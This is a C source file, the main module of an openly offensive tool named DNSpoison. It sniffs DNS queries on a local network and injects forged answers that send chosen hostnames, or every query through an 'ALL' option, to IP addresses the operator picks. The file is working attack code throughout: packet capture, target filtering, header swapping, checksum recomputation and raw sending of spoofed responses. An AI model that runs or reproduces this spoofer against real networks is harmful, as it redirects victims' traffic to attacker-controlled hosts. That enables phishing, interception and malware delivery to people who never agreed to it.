/*
 *  DNSpoison
 *  src/dnspoison.c
 *
 *  Copyright (C) 2011
 *
 *  Author: Vilmain Nicolas
 *  Contact: null.sim@gmail.com
 *
 *  This file is part of DNSpoison.
 *
 *  DNSpoison is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  DNSpoison is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with DNSpoison.  If not, see <http://www.gnu.org/licenses/>.
 */

#include  "dnspoison.h"
#include  <getopt.h>

static int    decode_program_param (int argc, char **argv,
				    struct netconf_s *nc);
static int    add_url_to_stack (char *arg, int addr_family);
static int    add_ip_to_url (char *arg, int addr_family, void ***tab,
			     size_t size_alloc, int *sizetab);
static int    add_ip_in_tab (void ***tab, int i, size_t size_alloc,
			     int addr_family, const char *strip);
static struct url_s *  search_url_by_name (const char *strurl, int all);
static int    set_target (int argc, char **argv, struct in_addr *mask);
static int    loop_dns_packet (struct netconf_s *nc);
static int    analyze_packet (union packet *pkt, const char *strurl,
			      int ipvn, int pktsize);
static void   print_resolv_url_data (uint32_t ip_src, const char *strurl,
				     int ipvn, struct url_s *url);
static int    send_dns_response (union packet *pkt, struct url_s *url,
				 int ipvn, int pkt_size);
static int    set_signal_handler (void);
static void   abort_program (int val);
static void   version (void);
static void   usage (void);

/* global because, this variable need free in signal handler ! */
static struct url_s *urlstack;
struct in_addr **target;
struct ethsock_s *sock;
static int sniff;

int
main (int argc, char **argv)
{
  struct netconf_s nc;

  urlstack = NULL;
  target = NULL;
  sniff = 0;
  program_name = argv[0];
  if (decode_program_param (argc, argv, &nc))
    abort_program (-1);
  loop_dns_packet (&nc);
  abort_program (-1);
  return EXIT_SUCCESS;
}

static int
decode_program_param (int argc, char **argv, struct netconf_s *nc)
{
  size_t result;
  char *device_name = NULL;
  char current_opt;
  struct url_s *p = NULL;
  struct option const long_opt[] =
    {
      {"help",             no_argument,        0,   'h'},
      {"version",          no_argument,        0,   'v'},
      {"device",           required_argument,  0,   'i'},
      {"ipv4-url",         required_argument,  0,   'u'},
      {"ipv6-url",         required_argument,  0,   'U'},
      {"sniff",            no_argument,        0,   's'},
      {0,                  0,                  0,   0}
    };

  do
    {
      current_opt = getopt_long (argc, argv, "hvi:u:U:s", long_opt, NULL);
      switch (current_opt)
	{
	case 'h':
	  usage ();
	  break;
	case 'v':
	  version ();
	  break;
	case 'i':
	  device_name = argv[optind - 1];
	  break;
	case 'u':
	  if (add_url_to_stack (optarg, AF_INET))
	    return -1; 
	  break;
	case 'U':
	  if (add_url_to_stack (optarg, AF_INET6))
	    return -1;
	  break;
	case 's':
	  sniff = 1;
	  break;
	}
    }
  while (current_opt != -1);
  if (set_signal_handler ()
      || get_netconf (nc, device_name)
      || set_target (argc, argv, &nc->nc_ipv4))
    return -1;
  if (!urlstack && !sniff)
    {
      fprintf (stderr, "%s: not url defined and not set sniffing mode\n"
	       "try %s --help for program usage\n",
	       program_name, program_name);
      return -1;
    }
  p = urlstack;
  result = MIN_PACKET + sizeof (struct dnshdr_s);
  while (p)
    {
      if (p->ipv4)
	{
	  if ((int) ((p->n_ip4 * 16) + result) > nc->nc_mtu)
	    {
	      fprintf (stderr, "%s: you defined too much IPv4 address\n",
		       program_name);
	      return -1;
	    }
	}
      if (p->ipv6)
	{
	  if ((int) ((p->n_ip6 * 28) + result) > nc->nc_mtu)
	    {
	      fprintf (stderr, "%s: you defined too much IPv6 address\n",
		       program_name);
	      return -1;
	    }
	}
      p = p->prev;
    }
  return 0;
}

static int
add_url_to_stack (char *arg, int addr_family)
{
  char *buf = NULL;
  struct url_s *url = NULL;

  buf = strchr (arg, '@');
  if (!buf || !*(buf + 1))
    {
      fprintf (stderr, "%s: invalid argument <%s>\n",
	       program_name, arg);
      return -1;
    }
  *buf++ = 0;
  url = search_url_by_name (buf, 0);
  if (!url)
    {
      url = xcalloc (sizeof (struct url_s));
      url->prev = urlstack;
      urlstack = url;
      url->url = xstrdup (buf);
      url->n_ip4 = 1;
      url->n_ip6 = 1;
    }
  if (addr_family == AF_INET)
    return add_ip_to_url (arg, AF_INET, (void ***) &url->ipv4,
			  sizeof (struct in_addr), &url->n_ip4);
  return add_ip_to_url (arg, AF_INET6, (void ***) &url->ipv6,
			sizeof (struct in6_addr), &url->n_ip6);
}

static int
add_ip_to_url (char *arg, int addr_family, void ***tab,
	      size_t size_alloc, int *sizetab)
{
  char *buf = NULL;

  buf = strchr (arg, '-');
  if (!buf)
    {
      (*sizetab)++;
      if (add_ip_in_tab (tab, *sizetab, size_alloc,
			 addr_family, arg) == -1)
	{
	  fprintf (stderr, "%s: invalid IP address <%s>\n",
		   program_name, arg);
	  return -1;
	}
    }
  else
    {
      buf = strtok (arg, "-");
      if (!buf)
	{
	  fprintf (stderr, "%s: invalid argument\n",
		   program_name);
	  return -1;
	}
      do
	{
	  (*sizetab)++;
	  if (add_ip_in_tab (tab, *sizetab, size_alloc,
			     addr_family, buf) == -1)
	    {
	      fprintf (stderr, "%s: invalid IP address <%s>\n",
		       program_name, buf);
	      return -1;
	    }
	  buf = strtok (NULL, "-");
	}
      while (buf);
    }
  return 0;
}

static int
add_ip_in_tab (void ***tab, int i, size_t size_alloc,
	       int addr_family, const char *strip)
{
  *tab = xrealloc (*tab, i * sizeof (void *));
  tab[0][i - 2] = xcalloc (size_alloc);
  if (!inet_pton (addr_family, strip, tab[0][i - 2]))
    return -1;
  tab[0][i - 1] = NULL;
  return 0;
}

static int
set_target (int argc, char **argv, struct in_addr *mask)
{
  int nhost;

  if (!(argc - optind))
    return 0;
  for (nhost = 1; (argc - optind); optind++)
    {
      target = xrealloc (target, (++nhost) * sizeof (struct in_addr *));
      target[nhost - 2] = xcalloc (sizeof (struct in_addr));
      if (!inet_pton (AF_INET, argv[optind], target[nhost - 2]))
	{
	  fprintf (stderr, "%s: invalid ip <%s>\n", program_name,
		   argv[optind]);
	  return -1;
	}
      if (memcmp (target[nhost - 2], mask, 3))
	{
	  fprintf (stderr, "%s: invalid network mask for ip <%s>\n",
		   program_name, argv[optind]);
	  return -1;
	}
    }
  target[nhost - 1] = NULL;
  return 0;
}

static struct url_s *
search_url_by_name (const char *strurl, int all)
{
  struct url_s *url = NULL;

  if (urlstack)
    {
      url = urlstack;
      do
	{
	  if (!strcmp (url->url, strurl)
	      || (all && !strcmp (url->url, "ALL")))
	    return url;
	  url = url->prev;
	}
      while (url);
    }
  return NULL;
}

static int
loop_dns_packet (struct netconf_s *nc)
{
  union packet packet;
  char url[URL_LEN];
  int ret;
  int size;

  sock = xcalloc (sizeof (struct ethsock_s));
  if (get_ethsock (sock, nc->nc_index, nc->nc_name) == -1)
    return -1;
  printf ("program started%s CTRL-C for stop\n",
	  (sniff) ? " (with sniff mode)," : ",");
  for (;;)
    {
      size = ethrecv (sock->fdsock, &packet, nc->nc_mtu);
      if (size == -1)
	return -1;
      ret = packet_is_dns_request (&packet, url);
      if (ret > 0)
	{
	  if (analyze_packet (&packet, url, ret, size) == -1)
	    return -1;
	}
    }
  return 0;
}

static int
analyze_packet (union packet *pkt, const char *strurl, int ipvn, int pktsize)
{
  int i;
  struct url_s *url = NULL;
  uint32_t *ip_src;

  ip_src = &pkt->hdr.ip.saddr;
  if (target)
    {
      for (i = 0; target[i]; i++)
	{
	  if (!CMP_IP (target[i], ip_src))
	    break;
	}
      if (!target[i])
	return 0;
    }
  url = search_url_by_name ((strurl + 1), 1);
  if (!url)
    {
      if (sniff)
	print_resolv_url_data (*ip_src, strurl, ipvn, NULL);
      return 0;
    }
  if ((ipvn == 4 && !url->ipv4)
      || (ipvn == 6 && !url->ipv6))
    {
      if (sniff)
	print_resolv_url_data (*ip_src, strurl, ipvn, NULL);
      return 0;
    }
  print_resolv_url_data (*ip_src, strurl, ipvn, url);
  return send_dns_response (pkt, url, ipvn, pktsize);
}

#define P_VOID(var)   (void **) var
static void
print_resolv_url_data (uint32_t ip_src, const char *strurl,
		       int ipvn, struct url_s *url)
{
  char ip[40];
  void **tab = NULL;
  int addrfamily;

  if (inet_ntop (AF_INET, &ip_src, ip, 16))
    printf ("%s ", ip);
  else
    printf ("IP unknow ");
  printf ("query Name: %s Type: ", strurl);
  if (ipvn == 4)
    {
      printf ("A (IPv4)");
      addrfamily = AF_INET;
      if (url)
	tab = P_VOID (url->ipv4);
    }
  else
    {
      printf ("AAA (IPv6)");
      addrfamily = AF_INET6;
      if (url)
	tab = P_VOID (url->ipv6);
    }
  if (tab)
    {
      memset (ip, 0, sizeof (ip));
      if (inet_ntop (addrfamily, tab[0], ip, sizeof (ip) - 1))
	printf (" -> %s ", ip);
      if (tab[1])
	printf ("...");
    }
  putchar ('\n');
  fflush (stdout);
}

static int
send_dns_response (union packet *pkt, struct url_s *url, int ipvn, int pkt_size)
{
  int len;
  uint8_t buff_addr[10];
  uint16_t buff_port;
  struct psdhdr_s addhdr;
  char udpbuf[1500];

  pkt_size = make_dns_header (pkt, url, pkt_size, ipvn);
  len = pkt_size - MIN_PACKET;
  /* ETHERNET */
  COPY_MAC (buff_addr, pkt->hdr.eth.dst);
  COPY_MAC (pkt->hdr.eth.dst, pkt->hdr.eth.src);
  COPY_MAC (pkt->hdr.eth.src, buff_addr);
  /* IP */
  COPY_IP (buff_addr, &pkt->hdr.ip.saddr);
  COPY_IP (&pkt->hdr.ip.saddr, &pkt->hdr.ip.daddr);
  COPY_IP (&pkt->hdr.ip.daddr, buff_addr);
  pkt->hdr.ip.id = 0;
  pkt->hdr.ip.tot_len = htons (sizeof (struct iphdr_s)
			       + sizeof (struct udphdr_s)
			       + len);
  pkt->hdr.ip.check = 0;
  pkt->hdr.ip.check = cksum ((unsigned short *) &pkt->hdr.ip,
			     sizeof (struct iphdr_s));
  /* UDP */
  buff_port = pkt->hdr.udp.dest;
  pkt->hdr.udp.dest = pkt->hdr.udp.source;
  pkt->hdr.udp.source = buff_port;
  pkt->hdr.udp.len = htons (len + sizeof (struct udphdr_s));
  pkt->hdr.udp.check = 0;
  /* UDP add header */
  addhdr.useless = 0;
  addhdr.protocol = PROTO_UDP;
  addhdr.length = htons (len + sizeof (struct udphdr_s));
  COPY_IP (&addhdr.saddr, &pkt->hdr.ip.saddr);
  COPY_IP (&addhdr.daddr, &pkt->hdr.ip.daddr);
  memcpy (udpbuf, &pkt->hdr.udp, sizeof (struct udphdr_s));
  memcpy ((udpbuf + sizeof (struct udphdr_s)),
	  &addhdr, sizeof (struct psdhdr_s));
  memcpy ((udpbuf + (sizeof (struct udphdr_s)
		     + sizeof (struct psdhdr_s))),
	  (pkt->packet + MIN_PACKET), len);
  pkt->hdr.udp.check = cksum ((unsigned short *) udpbuf,
			      sizeof (struct udphdr_s)
			      + sizeof (struct psdhdr_s) + len);
  return ethsend (sock, pkt->packet, pkt_size);
}

static int
set_signal_handler (void)
{
  struct sigaction sigact;

  memset (&sigact, 0, sizeof (struct sigaction));
  sigact.sa_handler = &abort_program;
  if (sigaction (SIGINT, &sigact, NULL) == -1)
    {
      fprintf (stderr, "%s:sigaction(SIGINT): %s\n",
	       program_name, strerror (errno));
      return -1;
    }
  return 0;
}

static void
abort_program (int val)
{
  struct url_s *p_prev = NULL;

  if (sock)
    {
      (void) close (sock->fdsock);
      free (sock);
    }
  free_tab (P_VOID (target));
  while (urlstack)
    {
      p_prev = urlstack->prev;
      if (urlstack->url)
	free (urlstack->url);
      free_tab (P_VOID (urlstack->ipv4));
      free_tab (P_VOID (urlstack->ipv6));
      free (urlstack);
      urlstack = p_prev;
    }
  exit ((val == -1) ? EXIT_FAILURE : EXIT_SUCCESS);
}

static void
version (void)
{
  puts (PROGRAM_VERSION);
  exit (EXIT_SUCCESS);
}

static void
usage (void)
{
  printf ("%s usage: %s -u ipv4@url -U ipv6@url [-hvis] target ...\n"
	  "Define IPv4 address\n"
	  " -u ipv4@hostname\n"
	  " or define multiple ipv4 for one hostname:\n"
	  " -u ipv4-ipv4-ipv4@hostname\n"
	  "\nDefine IPv6 address\n"
	  " -U ipv6@hostname\n"
	  " or define multiple ipv6 for one hostname\n"
	  " -U ipv6-ipv6-ipv6@hostname\n"
	  "example:\n"
	  "  ./dnspoison -u 1.1.1.1-2.2.2.2@exemple.com -U 2001:db8:0:85a3:0:0:ac1f:8001@exemple.com\n"
	  "\nDefined URL:\n"
	  "  If URL is equal to ALL, the IP address will then be sent to all\n"
	  "  resolution requests, whatever is the url\n"
          "  example: \n"
	  "    exemple: ./dnspoison 1.1.1.1@ALL\n"
          "\nDefined target:\n"
          "  set host ./dnspoison [options] target1 target2\n"
	  "  just sniff and send false response to target list.\n"
	  "  By default all host is defined\n"
	  "\narguments:\n"
	  "  -h, --help        show program usage and exit\n"
	  "  -v, --version     show program version and exit\n"
	  "  -i, --device      set network interface\n"
	  "  -u, --ipv4-url    set IPv4 address to URL\n"
	  "  -U, --ipv6-url    set IPv6 address to URL\n"
	  "  -s, --sniff       set sniffing mode, not send DNS response\n",
	  program_name, program_name);
  exit (EXIT_SUCCESS);
}
